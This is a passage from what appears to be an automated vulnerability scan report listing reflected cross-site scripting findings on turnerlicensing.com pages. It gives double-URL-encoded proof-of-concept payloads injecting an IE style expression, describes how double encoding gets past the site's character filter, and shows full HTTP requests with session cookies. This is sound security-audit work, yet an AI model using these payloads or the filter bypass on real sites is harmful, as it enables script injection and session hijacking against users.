The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72a41'style='x:expression(alert(1))'34af1748ca7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Vermont?72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:40 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 328766735:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=960
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54501


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Vermont</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175751&72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7=1&72a41%27style%3d%27x%3aexpression%28alert%281%29%29%2734af1748ca7=1&72a41'style='x:expression(alert(1))'34af1748ca7=1&fromsla=T'>
...[SNIP]...

2.234. http://www.turnerlicensing.com/teams_by_state/Virginia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Virginia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b052'style='x:expression(alert(1))'f30387b07b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Virginia?6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:49 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1222461688:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=992
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110341


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Virginia</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175753&6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1=1&6b052%27style%3d%27x%3aexpression%28alert%281%29%29%27f30387b07b1=1&6b052'style='x:expression(alert(1))'f30387b07b1=1&fromsla=T'>
...[SNIP]...

2.235. http://www.turnerlicensing.com/teams_by_state/Washington [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Washington

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fa0b'style='x:expression(alert(1))'1b3031fc933 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Washington?6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:51 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1114207312:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=965
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111137


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Washington</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175754&6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933=1&6fa0b'style='x:expression(alert(1))'1b3031fc933=1&6fa0b%27style%3d%27x%3aexpression%28alert%281%29%29%271b3031fc933=1&fromsla=T'>
...[SNIP]...

2.236. http://www.turnerlicensing.com/teams_by_state/Washington-D-C [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Washington-D-C

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9be7f'style='x:expression(alert(1))'e43a7f2732a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Washington-D-C?9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:53 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 772670783:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=907
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 98552


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Washington D.C.</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175755&9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a=1&9be7f'style='x:expression(alert(1))'e43a7f2732a=1&9be7f%27style%3d%27x%3aexpression%28alert%281%29%29%27e43a7f2732a=1&fromsla=T'>
...[SNIP]...

2.237. http://www.turnerlicensing.com/teams_by_state/West-Virginia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/West-Virginia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3347'style='x:expression(alert(1))'6cb889a7789 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/West-Virginia?e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:56 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -1699126261:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=758
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110374


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>West Virginia</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175756&e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789=1&e3347%27style%3d%27x%3aexpression%28alert%281%29%29%276cb889a7789=1&e3347'style='x:expression(alert(1))'6cb889a7789=1&fromsla=T'>
...[SNIP]...

2.238. http://www.turnerlicensing.com/teams_by_state/Wisconsin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Wisconsin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a45e'style='x:expression(alert(1))'841fffba0cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Wisconsin?9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:56 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -109238793:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=749
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110580


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wisconsin</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175758&9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf=1&9a45e'style='x:expression(alert(1))'841fffba0cf=1&fromsla=T&9a45e%27style%3d%27x%3aexpression%28alert%281%29%29%27841fffba0cf=1'>
...[SNIP]...

2.239. http://www.turnerlicensing.com/teams_by_state/Wyoming [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Wyoming

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17380'style='x:expression(alert(1))'10b3c762605 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Wyoming?17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:52 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -811325613:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=998
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54501


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wyoming</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
nsing.com/s.nl?sc=77&category=175759&17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605=1&17380%27style%3d%27x%3aexpression%28alert%281%29%29%2710b3c762605=1&fromsla=T&17380'style='x:expression(alert(1))'10b3c762605=1'>
...[SNIP]...

2.240. http://www.turnerlicensing.com/turner [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5edf2'style='x:expression(alert(1))'d6b4ca84651 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner?5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:55 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 772671243:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=955
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 41652


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Homepage - Turner</title>


<meta name=...robots... content=...NOODP,NOYDIR...>
<script language='JavaScript'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/turner?5edf2%27style%3d%27x%3aexpression%28alert%281%29%29%27d6b4ca84651=1&5edf2'style='x:expression(alert(1))'d6b4ca84651=1'>
...[SNIP]...

2.241. http://www.turnerlicensing.com/turner_about_us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_about_us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12db7'style='x:expression(alert(1))'560f4d45a75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_about_us?12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:47 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2143029176:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=984
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 35153


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - About us</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...
http://www.turnerlicensing.com/s.nl?it=I&id=73&12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75=1&12db7%27style%3d%27x%3aexpression%28alert%281%29%29%27560f4d45a75=1&12db7'style='x:expression(alert(1))'560f4d45a75=1&fromsla=T'>
...[SNIP]...

2.242. http://www.turnerlicensing.com/turner_boxed_note_cards [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_boxed_note_cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372c9'style='x:expression(alert(1))'137ac6a221e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /turner_boxed_note_cards?372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:59 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -109238462:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=991
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99993


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boxed Note Cards</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175953&372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e=1&372c9'style='x:expression(alert(1))'137ac6a221e=1&372c9%27style%3d%27x%3aexpression%28alert%281%29%29%27137ac6a221e=1&fromsla=T'>
...[SNIP]...

2.243. http://www.turnerlicensing.com/turner_christmas_cards [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /turner_christmas_cards

Issue detail

